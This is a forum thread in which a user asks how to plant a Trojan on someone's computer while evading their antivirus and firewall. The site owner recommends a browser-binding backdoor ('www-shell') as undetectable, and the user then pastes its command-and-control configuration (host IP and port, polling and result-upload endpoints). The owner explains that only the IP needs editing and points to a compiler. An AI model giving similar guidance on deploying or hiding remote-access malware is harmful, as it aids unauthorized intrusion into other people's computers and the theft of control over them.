Firewall and Antivirus
- weedkiller
- forum buddy
- Posts: 24
- Joined: 24 Jan 2006, 17:00
- 18
Firewall and Antivirus
OK how do i plant a Trojan in someones computer whitout there antivirus or firewall blocks it ??!!? :p
- bad_brain
- Site Owner
- Posts: 11639
- Joined: 06 Apr 2005, 16:00
- 19
- Location: In your eye floaters.
- Contact:
almost impossible to say...
it depends on the firewall/virus scanner, Norton and F-Secure (I think) programs are running self-diagnosises, so it´s hard to disable these ones.
but I can recommend the good old www-shell, it binds to the browser, so it´s undetectable (if you not exactly know what you´re looking for)...
it depends on the firewall/virus scanner, Norton and F-Secure (I think) programs are running self-diagnosises, so it´s hard to disable these ones.
but I can recommend the good old www-shell, it binds to the browser, so it´s undetectable (if you not exactly know what you´re looking for)...
- weedkiller
- forum buddy
- Posts: 24
- Joined: 24 Jan 2006, 17:00
- 18
- weedkiller
- forum buddy
- Posts: 24
- Joined: 24 Jan 2006, 17:00
- 18
- weedkiller
- forum buddy
- Posts: 24
- Joined: 24 Jan 2006, 17:00
- 18
sorry for asking so many questions but still dont realy understand how to compile it i downloaded the program it says in the Readme file
// this is the servers ip and port
#define HOST "http://192.168.0.23:8888/"
// amount of seconds between to getCommand requests
#define POLL_INTERVAL 1
// the maximum size of an URL
// The standard sets no limit. But maybe your browser does
#define MAX_URL_SIZE 400
/* normally you don't want to edit this */
#define POLL "getCommand"
#define RESPONSE "response?info="
#define RESULT "sendResult?data="
#define BEGIN "beginResult"
#define END "endResult"
#endif
what of this do you need to edite by the way????
// this is the servers ip and port
#define HOST "http://192.168.0.23:8888/"
// amount of seconds between to getCommand requests
#define POLL_INTERVAL 1
// the maximum size of an URL
// The standard sets no limit. But maybe your browser does
#define MAX_URL_SIZE 400
/* normally you don't want to edit this */
#define POLL "getCommand"
#define RESPONSE "response?info="
#define RESULT "sendResult?data="
#define BEGIN "beginResult"
#define END "endResult"
#endif
what of this do you need to edite by the way????
- bad_brain
- Site Owner
- Posts: 11639
- Joined: 06 Apr 2005, 16:00
- 19
- Location: In your eye floaters.
- Contact:
just the IP-adresses...
and for compiling check here:
http://www.thefreecountry.com/compilers/cpp.shtml
and for compiling check here:
http://www.thefreecountry.com/compilers/cpp.shtml
-
- suck-o-fied!
- Posts: 99
- Joined: 15 Jan 2006, 17:00
- 19
- Location: USA
so does this bind itself to all browsers? does it only open there computer when they have a browser open?bad_brain wrote:just the IP-adresses...
and for compiling check here:
http://www.thefreecountry.com/compilers/cpp.shtml
- weedkiller
- forum buddy
- Posts: 24
- Joined: 24 Jan 2006, 17:00
- 18
- Nerdz
- The Architect
- Posts: 1127
- Joined: 15 Jun 2005, 16:00
- 19
- Location: #db_error in: select usr.location from sucko_member where usr.id=63;
- Contact:
I have download it for fun, look in the readme file , they will tell you excatly where to get the compilator...
But i also read that it is for german windows or what?... And also... how do you unbind it after... bcz b4 playing with it I just wanna make sure ill be able to remove it from my network comps
But i also read that it is for german windows or what?... And also... how do you unbind it after... bcz b4 playing with it I just wanna make sure ill be able to remove it from my network comps
Give a man a fish, you feed him for one day.
Learn a man to fish, you feed him for life.
Learn a man to fish, you feed him for life.
- weedkiller
- forum buddy
- Posts: 24
- Joined: 24 Jan 2006, 17:00
- 18